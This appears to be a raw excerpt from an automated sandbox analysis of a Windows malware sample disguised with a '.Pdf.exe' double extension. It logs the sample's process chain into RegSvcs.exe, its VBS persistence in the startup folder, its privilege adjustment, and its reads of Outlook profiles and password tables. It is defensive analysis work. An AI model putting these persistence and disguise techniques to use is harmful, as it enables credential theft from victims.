Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000CCE7A GetLastError,FormatMessageW,

0_2_000CCE7A

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000BAB84 AdjustTokenPrivileges,CloseHandle,	0_2_000BAB84
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000BB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_000BB134
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BEAB84 AdjustTokenPrivileges,CloseHandle,	1_2_00BEAB84
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BEB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	1_2_00BEB134

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000CE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_000CE1FD

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000C6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_000C6532

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000DC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_000DC18C

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_0008406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_0008406B

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

File created: C:\Users\user\AppData\Local\Wausaukee

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

File created: C:\Users\user\AppData\Local\Temp\autF9F7.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs"

Source: IMG-20241119-WA0006(162KB).Pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.4120751881.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002FAE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4120751881.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4121149937.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: IMG-20241119-WA0006(162KB).Pdf.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

File read: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe "C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe"
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Process created: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe "C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe"
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe "C:\Users\user\AppData\Local\Wausaukee\silvexes.exe"
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Wausaukee\silvexes.exe"
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Process created: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe "C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe "C:\Users\user\AppData\Local\Wausaukee\silvexes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Wausaukee\silvexes.exe"	Jump to behavior

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: IMG-20241119-WA0006(162KB).Pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IMG-20241119-WA0006(162KB).Pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IMG-20241119-WA0006(162KB).Pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IMG-20241119-WA0006(162KB).Pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IMG-20241119-WA0006(162KB).Pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IMG-20241119-WA0006(162KB).Pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: IMG-20241119-WA0006(162KB).Pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: silvexes.exe, 00000001.00000003.1695952720.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, silvexes.exe, 00000001.00000003.1697558560.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, silvexes.exe, 00000004.00000003.1821250364.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, silvexes.exe, 00000004.00000003.1821528882.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: silvexes.exe, 00000001.00000003.1695952720.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, silvexes.exe, 00000001.00000003.1697558560.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, silvexes.exe, 00000004.00000003.1821250364.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, silvexes.exe, 00000004.00000003.1821528882.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp

Source: IMG-20241119-WA0006(162KB).Pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IMG-20241119-WA0006(162KB).Pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IMG-20241119-WA0006(162KB).Pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IMG-20241119-WA0006(162KB).Pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IMG-20241119-WA0006(162KB).Pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_0009E01E LoadLibraryA,GetProcAddress,

0_2_0009E01E

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000AC09E push esi; ret	0_2_000AC0A0
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000AC187 push edi; ret	0_2_000AC189
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_0009288B push 66000923h; retn 000Fh	0_2_000928E1
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000EC8BC push esi; ret	0_2_000EC8BE
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000A6B05 push ecx; ret	0_2_000A6B18
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000CB2B1 push FFFFFF8Bh; iretd	0_2_000CB2B3
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000ABDAA push edi; ret	0_2_000ABDAC
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000ABEC3 push esi; ret	0_2_000ABEC5
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C1C0E3 push D72415FFh; ret	1_2_00C1C0ED
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BDC09E push esi; ret	1_2_00BDC0A0
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BDC187 push edi; ret	1_2_00BDC189
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C1C148 push D72415FFh; ret	1_2_00C1C152
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C32404 push ss; ret	1_2_00C32405
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C1C8BC push esi; ret	1_2_00C1C8BE
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BD6B05 push ecx; ret	1_2_00BD6B18
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BBADB9 push edi; ret	1_2_00BBADBA
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BBADBD push edi; ret	1_2_00BBADBE
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BBADB3 push esi; ret	1_2_00BBADB6
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BBADAC push esi; ret	1_2_00BBADB2
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BBAD9C push edi; ret	1_2_00BBADAA
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BBEE14 push esi; retn 0000h	1_2_00BBEE16
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BFB2B1 push FFFFFF8Bh; iretd	1_2_00BFB2B3
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BDBDAA push edi; ret	1_2_00BDBDAC
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BDBEC3 push esi; ret	1_2_00BDBEC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06832E78 push esp; iretd	2_2_06832E79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06832840 push esp; retf	2_2_06832AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05042E60 push esp; iretd	5_2_05042E79

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

File created: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: IMG-20241119-WA0006(162KB).Pdf.exe

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000E8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_000E8111
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_0009EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_0009EB42
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C18111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	1_2_00C18111
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BCEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	1_2_00BCEB42

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000A123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_000A123A

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
